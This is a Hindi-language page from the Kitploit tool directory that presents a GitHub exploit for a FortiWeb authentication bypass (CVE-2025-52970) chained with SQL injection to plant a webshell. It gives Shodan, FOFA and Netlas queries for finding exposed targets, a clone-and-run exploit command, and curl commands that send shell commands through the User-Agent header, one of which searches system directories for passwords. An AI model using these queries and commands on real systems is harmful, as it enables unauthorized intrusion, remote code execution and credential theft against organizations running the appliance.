Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
FortiWeb-CVE-2025-52970-Authentication-Bypass — फोर्टीवेब (CVE-2025-52970) में प्रमाणीकरण बाईपास को SQL इंजेक्शन के साथ जोड़कर वेबशेल अपलोड करने और HTTP हेडर्स के माध्यम से रिमोट कोड एक्जीक्यूशन प्राप्त करने का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/hex00-0x4/fortiweb-cve-2025-52970-authentication-bypass
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubhex00-0x4/fortiweb-cve-2025-52970-authentication-bypass

FortiWeb-CVE-2025-52970-Authentication-Bypass

फोर्टीवेब (CVE-2025-52970) में प्रमाणीकरण बाईपास को SQL इंजेक्शन के साथ जोड़कर वेबशेल अपलोड करने और HTTP हेडर्स के माध्यम से रिमोट कोड एक्जीक्यूशन प्राप्त करने का प्रदर्शन करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
93131 साल पहलेअभी तक समीक्षित नहीं

🚨 FortiWeb प्रमाणीकरण बायपास → दूरस्थ कोड निष्पादन

📌 अवलोकन

यह रिपॉजिटरी FortiWeb में एक प्रमाणीकरण बाईपास प्रदर्शित करता है जिसे दूरस्थ कोड निष्पादन (RCE) प्राप्त करने के लिए श्रृंखलाबद्ध किया जा सकता है।
यह शोषण SQL पेलोड इंजेक्ट करने, एक वेबशेल अपलोड करने और HTTP हेडर के माध्यम से कमांड निष्पादित करने के लिए एक कमजोर एंडपॉइंट का लाभ उठाता है।

⚠️ अस्वीकरण:
यह प्रोजेक्ट केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है।
उन सिस्टमों के विरुद्ध उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।

Netlas FOFA और Shodan

Screenshot 2025-08-23 131226
root@kitploit:~
((FortiWeb)) AND port:("8443")

### FOFA
title="FortiWeb" && port="8443"

### Shodan
ssl:"FortiWeb" port:8443
http.title:"FortiWeb" port:8443

🔎 भेद्यता विवरण

  • CVE: CVE-2025-52970

  • घटक: FortiWeb Fabric API (/api/fabric/device/status)

  • प्रभाव: प्रमाणीकरण बाईपास → SQL इंजेक्शन → वेबशेल अपलोड → RCE

  • वेक्टर: निर्मित Authorization हेडर + SQL इंजेक्शन

🧑‍💻 शोषण कार्यप्रवाह

  1. अस्थायी SQL तालिका को हटाएं और बनाएं।

  2. वेबशेल पेलोड को भागों में लिखें।

  3. शेल को /cgi-bin/x.cgi पर निर्यात करें।

  4. अनुमतियाँ ट्रिगर करने के लिए सहायक Python स्क्रिप्ट अपलोड करें।

  5. User-Agent हेडर के माध्यम से कमांड भेजकर वेबशेल तक पहुंचें।

    ⚙️ उपयोग

1️⃣ रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/your-username/Fortinet-AuthBypass-Exploit.git
cd Fortinet-AuthBypass-Exploit
python3 exploit.py -t https://TARGET:8443/

Screenshot 2025-08-23 114753 Screenshot 2025-08-23 114915

3️⃣ वेबशेल के साथ इंटरैक्ट करें

root@kitploit:~
curl -ks -H 'User-Agent: id' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: whoami' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: uname -a' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: grep -ril pass /etc /conf /data 2>/dev/null' https://TARGET:8443/cgi-bin/x.cgi
Screenshot 2025-08-23 114521
टूल डाउनलोड करें